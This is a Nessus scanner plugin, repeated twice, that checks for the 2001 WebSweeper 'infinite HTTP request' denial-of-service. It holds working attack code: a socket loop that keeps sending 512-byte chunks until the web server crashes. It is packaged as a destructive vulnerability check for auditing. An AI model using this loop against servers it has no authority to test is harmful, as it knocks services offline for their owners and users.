Nice concept published by Peter Gründl...
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 8 Mar 2001 15:04:20 +0100
# From: "Peter_Gründl" <peter.grundl@DEFCOM.COM>
# Subject: def-2001-10: Websweeper Infinite HTTP Request DoS
# To: BUGTRAQ@SECURITYFOCUS.COM
#
# Affected:
# WebSweeper 4.0 for Windows NT
#
if(description)
{
# script_id(11083);
script_version ("$Revision$");
name["english"] = "Infinite HTTP request";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid 'infinite' HTTP request that never ends.
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Infinite HTTP request kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
family["francais"] = "Déni de service";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 80);
script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
exit(0);
}
########
include("http_func.inc");
if (safe_checks()) exit(0);
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
r= http_get(item:"/", port:port);
r= r - string("\r\n\r\n");
r= string(r, "\r\n", "Referer: ", crap(512));
send(socket:soc, data: r);
cnt = 64;
# Endless loop - let's hope the script will be killed by Nessus if the
# remote server never dies :-)
while (send(socket: soc, data: crap(512)) > 0) { cnt = cnt+512;}
display("CNT=", cnt, "\n");
# Keep the socket open
sleep(1);
if(! http_is_alive(port)) security_hole(port);
close(soc);
#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:
# Date: Thu, 8 Mar 2001 15:04:20 +0100
# From: "Peter_Gründl" <peter.grundl@DEFCOM.COM>
# Subject: def-2001-10: Websweeper Infinite HTTP Request DoS
# To: BUGTRAQ@SECURITYFOCUS.COM
#
# Affected:
# WebSweeper 4.0 for Windows NT
#
if(description)
{
# script_id(11083);
script_version ("$Revision$");
name["english"] = "Infinite HTTP request";
script_name(english:name["english"]);
desc["english"] = "It was possible to kill the web server by
sending an invalid 'infinite' HTTP request that never ends.
A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.
Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";
script_description(english:desc["english"]);
summary["english"] = "Infinite HTTP request kills the web server";
script_summary(english:summary["english"]);
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
family["english"] = "Denial of Service";
family["francais"] = "Déni de service";
script_family(english:family["english"], francais:family["francais"]);
script_require_ports("Services/www", 80);
script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
exit(0);
}
########
include("http_func.inc");
if (safe_checks()) exit(0);
port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
soc = http_open_socket(port);
if(! soc) exit(0);
r= http_get(item:"/", port:port);
r= r - string("\r\n\r\n");
r= string(r, "\r\n", "Referer: ", crap(512));
send(socket:soc, data: r);
cnt = 64;
# Endless loop - let's hope the script will be killed by Nessus if the
# remote server never dies :-)
while (send(socket: soc, data: crap(512)) > 0) { cnt = cnt+512;}
display("CNT=", cnt, "\n");
# Keep the socket open
sleep(1);
if(! http_is_alive(port)) security_hole(port);
close(soc);